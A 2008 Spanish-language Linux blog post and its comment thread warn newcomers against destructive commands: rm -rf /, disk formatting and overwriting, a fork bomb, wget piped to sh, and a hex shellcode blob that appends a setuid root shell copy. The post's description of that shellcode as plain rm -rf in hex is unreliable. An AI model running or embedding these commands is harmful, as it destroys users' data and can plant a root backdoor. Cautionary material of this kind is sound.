7 Comandos maliciosos para Linux (Nunca pero nunca los ejecutes)

terminatortux

Linux tampoco esta libre de usuarios malintencionados y si eres nuevo en este entorno no esta de mas que conozcas estas cosas. Existen comandos que no es recomendable ejecutar en nuestro sistema o evitar ejecutar si estan contenidos dentro de shell scripts. Yo siempre digo que no hagais Copy & Paste al tuntun de comandos, o si os bajais algun script de un sitio que no conozcais, lo editeis al menos antes y echeis un vistazo a su contenido para evitar luego males mayores.

Algunos de estos comandos «peligrosos» son:

1. rm -rf /

Este comando borra recursivamente todos los ficheros almacenados en el directorio root. Vendria a ser el equivalente (mas o menos) a un FORMAT C: en Windows.

2.

char esp[] __attribute__ ((section(«.text»))) /* e.s.p
release */
= «\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68»
«\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99»
«\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7»
«\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56»
«\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31»
«\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69»
«\x6e\x2f\x73\x68\x00\x2d\x63\x00»
«cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;»;

Esta es el mismo comando que el anterior, pero escrito en su forma hexadecimal.

3. mkfs.ext3 /dev/sda

Formatea el sistema de archivos que se encuentra en /dev/sda (que generalmente es nuestro disco duro).

4. :(){:|:&};:

Conocido tambien como forkbomb, Este comando comenzara a crear y ejecutar un elevado numero de procesos en el sistema hasta que este se bloquee.

5. cualquier_comando > /dev/sda

Sobreescribe el dispositivo de bloques (/dev/sda) con la salida del comando ejecutado, generalmente borrando el contenido actual del dispositivo y provocado la perdida total de datos.

6. wget http://alguna_url -O- | sh

Este comando descargara un fichero ejecutable o script y lo ejecutara. Si el sitio no es confiable podria ser contenido malicioso.

7. mv /home/tu_usuario/* /dev/null

Mueve todas las carpetas de tu home a /dev/null, lo que provoca que sean borradas (eliminadas).

Fuentes | Malogey y Deadly Linux Commands

26 Respuestas to “7 Comandos maliciosos para Linux (Nunca pero nunca los ejecutes)”


  1. 1 superpiwi noviembre 21, 2008 a las 7:49 pm

    Yo añado:

    dd if=/dev/urandom of=/dev/sda

    que lo que hace es una copia de datos brutos (raw) desde un origen (if) a un destino (of), si el destino es nuestro disco duro (/dev/sda) pues machacamos el contenido.

  2. 2 jose noviembre 21, 2008 a las 8:35 pm

    Malicioso != Destructivo.

    Una expresión regular que coja /etc/passwd y busque usuarios sin contraseña me parece mucho más malicioso, aunque mucho menos destructivo, que casi todos los comandos aquí expuestos.

  3. 3 Juan Carlos noviembre 22, 2008 a las 1:13 am

    Pues quice utilizar el comando :(){:|:&};: y obtuve esto:

    usuario@usuario-desktop:~$ sudo :(){:|:&};:
    bash: syntax error near unexpected token `(‘
    usuario@usuario-desktop:~$

  4. 4 Lycus HackerEmo noviembre 22, 2008 a las 2:57 am

    valla que bien por la informacion.

    alguien podria crear un virus informatico usando esos comandos.

    jajaja.

  5. 5 Reoba noviembre 22, 2008 a las 8:56 am

    @ Juan Carlos:

    El comando seria este (o quizas unas \ mas):

    :\(\){:|:&};:

    Poniendo una \ en cada caracter que te marca como un error de sintaxis…

  6. 6 superpiwi noviembre 22, 2008 a las 9:04 am

    @Lycus

    Bueno un virus no, pero si tal vez un script que un usuario se descargue de un sitio pensando que hace otra cosa y de golpe se quede sin sus archivos. Hay mucho «malandrin» por ahi suelto ^^

  7. 7 GaTTsU noviembre 22, 2008 a las 10:39 am

    el desastre que provoca :(){ :|:& };: se puede corregir configurando limite de procesos por usuario en /etc/security/limits.conf
    $ ulimit -a, para ver los limites actuales
    editamos el /etc/security/limits.conf y agregamos/corregimos:
    * hard nproc 1024

    Una felicitacion para el blog, que siempre tiene algo interesante :).

  8. 8 betelgeuse noviembre 22, 2008 a las 1:13 pm

    Creo que el primer comando borra todo de todo, no solo el directorio root. Creo que paso de este comando por ahora (aunque cuando este delante del ordenador de alguien que me caiga mal… 🙂

  9. 9 ToRA noviembre 22, 2008 a las 2:02 pm

    y entonces para que existen? xDD que los dejen bloqueado o algo no se

  10. 10 manny noviembre 22, 2008 a las 3:16 pm

    de acuerdo con @TORA

    un mensaje de confirmacion deberia estar presente.

    «el siguiente comando BORRARA todo el sistema, estas seguro ?!!!!»

  11. 12 superpiwi noviembre 22, 2008 a las 4:58 pm

    bueno estos comandos existen pq si se usan bien son muy utiles.
    p.ej «dd» te podria crear una copia exacta de un disco duro en otro disco duro.
    el problema esta cuando se usan malamente.

  12. 13 Patrick Ryan noviembre 22, 2008 a las 7:23 pm

    No sé que tiene de mito y que de realidad. Pero una vez me tocó ir a un cliente que perdió uno de los nodos de un Sun Cluster, con Oracle y una BBDD rara rara rara (Tamino de SoftwareAG), las malas lenguas dicen que uno de los administradores ejecuto un «rm -rf *», probablemente desde el home del usuario root (que en Solaris si no lo cambias -y si no ha cambiado con versiones más recientes- es /).

    Otras malas lenguas dicen que es por instalación de parches de Sun, a mí en alguna ocasión me dieron problemas majos, que ríete del SP2 de XP. Pero esta versión tenía menos guasa que la del rm :p.

  13. 14 Pablo noviembre 24, 2008 a las 4:54 pm

    Para todos estos «códigos» hace falta ser administrador o loguearse con sudo(o su) previamente.

    Y yo cambiaría el título del post por «7 Comandos Destructivos para Linux …»

    🙂 Saludos

  14. 15 Antonio noviembre 24, 2008 a las 6:10 pm

    > el problema esta cuando se usan malamente.
    Bien dicho, Superpiwi

    El cuchillo de por sí… no es malicioso, lo malicioso es lo que las personas pueden hacer con él 🙂

  15. 16 Antonio noviembre 24, 2008 a las 6:11 pm

    Respecto a lo que comentaba GaTTsU sobre
    * hard nproc 1024
    hay que proteger al usuario de sí mismo…

    P.D. En Windows el usuario también podía fastidiarse si ejecutaba un .bat como:
    :s
    start %0
    goto s

  16. 17 juancholo noviembre 25, 2008 a las 4:11 am

    7 Comandos maliciosos para Linux (Nunca pero nunca los ejecutes)
    via :https://ubuntulife.wordpress.com/

  17. 18 roganibal noviembre 25, 2008 a las 5:28 am

    ejecute el rm -rf / en una maquina virtual con ubuntu y me dice que no se puede borrar la raiz incluso sin entrar en modo grafico y logueado como root no me borra nada


  1. 1 Comando linux.- lshw, como averiguar el hardware en ubuntu « Travesuras Trackback en noviembre 21, 2008 a las 10:58 pm
  2. 2 7 Comandos maliciosos para Linux (Nunca pero nunca los ejecutes) « Webeando en la red Trackback en noviembre 22, 2008 a las 1:47 am
  3. 3 7 Comandos Maliciosos para Linux « Paradise of Linux Trackback en noviembre 22, 2008 a las 2:40 am
  4. 4 Ta pa Ponga » Archivu del blogue » ¡Cuidaín colo que executes! Trackback en noviembre 24, 2008 a las 8:13 pm
  5. 5 El blog de Miguel » Enlaces interesantes de la semana #4 Trackback en noviembre 29, 2008 a las 4:59 pm
  6. 6 » Lo confiados que estan los Usuarios de Ubuntu | Tecnologías Libres Trackback en diciembre 10, 2008 a las 10:12 pm
  7. 7 Breves #2 « Guitarrista Geek Trackback en diciembre 15, 2008 a las 11:36 am

Deja un comentario







¿Es compatible tu equipo con Ubuntu?


( Muchos fondos de pantalla, aqui )

DESCARGATE SCIFI LIFE

365 Dias de Soledad
Me debes los sueños, las promesas y las noches rotas. Me debes la paz, la sonrisa y la esperanza robadas. Me debes la sangre, las lágrimas y el sudor vertido. Me debes las noches vacías, los abrazos anhelados. Me debes un beso de ajenjo de tu amarga boca.

The Ubuntu Counter Project - user number # 11961
Geo Visitors Map

Archivos

noviembre 2008
L M X J V S D
 12
3456789
10111213141516
17181920212223
24252627282930

Blog Stats

  • 31.401.293 hits